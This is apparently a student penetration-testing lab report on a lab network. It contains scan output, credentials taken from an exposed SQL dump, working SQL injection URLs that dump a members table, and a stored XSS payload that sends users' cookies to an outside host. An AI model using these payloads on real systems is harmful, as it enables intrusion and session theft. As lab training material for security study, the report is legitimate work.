BOT lab4 - HackMD

# BOT lab4 > Mateusz Suchocki, Kazimierz Kochan ## Basic informations IP ranges: 10.5.1.0/24 and 10.5.2.0/24 Discovered 3 hosts: `10.5.1.10`, `10.5.1.11` and `10.5.2.10` ## 10.5.1.10 (dmza.example.net) This is a one dmz server with ### Nmap scan ``` PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: exploit.co.il : Articles : Tutorials : Reviews : Videos ``` ### Web content discover ``` 301 GET 9l 31w 344c http://10.5.1.10/admin => http://10.5.1.10/admin/ 301 GET 9l 31w 345c http://10.5.1.10/images => http://10.5.1.10/images/ 200 GET 45l 178w 2295c http://10.5.1.10/search 301 GET 9l 31w 346c http://10.5.1.10/uploads => http://10.5.1.10/uploads/ 200 GET 0l 0w 0c http://10.5.1.10/config 200 GET 129l 406w 5743c http://10.5.1.10/news 200 GET 142l 387w 5050c http://10.5.1.10/downloads 200 GET 46l 184w 2488c http://10.5.1.10/links 301 GET 9l 31w 347c http://10.5.1.10/database => http://10.5.1.10/database/ 200 GET 388l 1071w 0c http://10.5.1.10/index 200 GET 388l 1071w 0c http://10.5.1.10/ 200 GET 166l 526w 7108c http://10.5.1.10/articles 200 GET 93l 289w 3829c http://10.5.1.10/videos 200 GET 1l 15w 248c http://10.5.1.10/footer 200 GET 1l 3w 9662c http://10.5.1.10/favicon 200 GET 24l 115w 1295c http://10.5.1.10/menu 200 GET 465l 1202w 0c http://10.5.1.10/results 200 GET 98l 243w 16850c http://10.5.1.10/logo 200 GET 70l 211w 2875c http://10.5.1.10/authors 200 GET 1l 2w 50c http://10.5.1.10/dot 200 GET 35l 154w 1920c http://10.5.1.10/newspage ``` ### SQL script Under a `/database` endpoint there is an `exploit.sql` script with credentials: ``` INSERT INTO `members` (`id`, `username`, `password`) VALUES (1, 'admin', 'P@ssw0rd'), (2, 'r00t', '1qa2ws'), (3, 'editor', 'q1w2e3r4'); ``` mails and websites of authors: ``` INSERT INTO `authors` (`id`, `name`, `mail`, `site`) VALUES (1, 'NightRanger', 'shai[at]exploit.co.il', 'http://exploit.co.il'), (2, 'Joe McCray', 'N/A', 'N/A'), (3, 'Imperva', 'N/A', 'http://www.imperva.com'), (4, 'PaulDotCom', 'N/A', 'http://pauldotcom.com'), (5, 'phpacademy', 'N/A', 'N/A'), (6, 'Raul Siles', 'N/A', 'http://www.raulsiles.com'), (7, 'SecuriTeam', 'N/A', 'http://www.securiteam.com'), (8, 'Wikipedia', 'N/A', 'http://www.wikipedia.org'), (9, 'Prashant Uniyal', 'N/A', 'N/A'), (10, 'novaca!ne', 'N/A', 'N/A'), (11, 'GlaDiaT0R', 'N/A', 'N/A'), (12, 'zeroday', 'N/A', 'N/A'), (13, 'Chris Anley', 'N/A', 'N/A'), (14, 'Kevin Spett', 'N/A', 'N/A'), (15, 'AnalyseR', 'N/A', 'N/A'), (16, 'Marezzi', 'N/A', 'N/A'), (17, 'Dapirates', 'N/A', 'N/A'), (18, 'CWH Underground', 'N/A', 'N/A'), (19, 'Frego', 'N/A', 'N/A'), (20, 'Omni', 'N/A', 'N/A'); ``` and some server informations: ``` -- phpMyAdmin SQL Dump -- version 3.3.2deb1 -- http://www.phpmyadmin.net -- -- Host: localhost -- Generation Time: Sep 24, 2010 at 08:20 AM -- Server version: 5.1.41 -- PHP Version: 5.3.2-1ubuntu4.5 ``` ### SQL injection `id` parameter is vulnerable to sql injection. `http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(schema_name),NULL,NULL,NULL,NULL%20FROM%20information_schema.schemata--%20-` `http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,username,password,NULL,NULL,NULL%20FROM%20members--%20-` ``` +----+----------+----------+ | id | password | username | +----+----------+----------+ | 1 | P@ssw0rd | admin | | 2 | 1qa2ws | r00t | | 3 | q1w2e3r4 | editor | +----+----------+----------+ ``` ### Webshell upload ``` <?php $servername='localhost'; // Your MySql Server Name or IP address here $dbusername='root'; // Login user id here $dbpassword='You should change this passphrase'; // Login password here $dbname='exploit'; // Your database name here connecttodb($servername,$dbname,$dbusername,$dbpassword); function connecttodb($servername,$dbname,$dbuser,$dbpassword) { global $link; $link=mysql_connect ("$servername","$dbuser","$dbpassword"); if(!$link){die("Could not connect to MySQL");} mysql_select_db("$dbname",$link) or die ("could not open db".mysql_error()); } ?> ``` ### Interesting images Under `/images` there are two interesting images ![](https://i.imgur.com/C1TyoL3.png) ![](https://i.imgur.com/7lgJ505.png) ### Stored XSS Payload in note's description: `<script>new Image().src="http://192.168.111.129/cookie.php?c="+document.cookie;</script>` Get a session cookie of users seeing an infected note ![](https://i.imgur.com/928OGUf.png) ## 10.5.1.11 (dmzb.example.net) Jakbyś potrzebował pomocy to pisz ![](https://i.imgur.com/BsKCUEF.png) ## Infrastructure misconfiguration Firewall should block traffic between dmzs ![](https://i.imgur.com/xHpf7Va.png)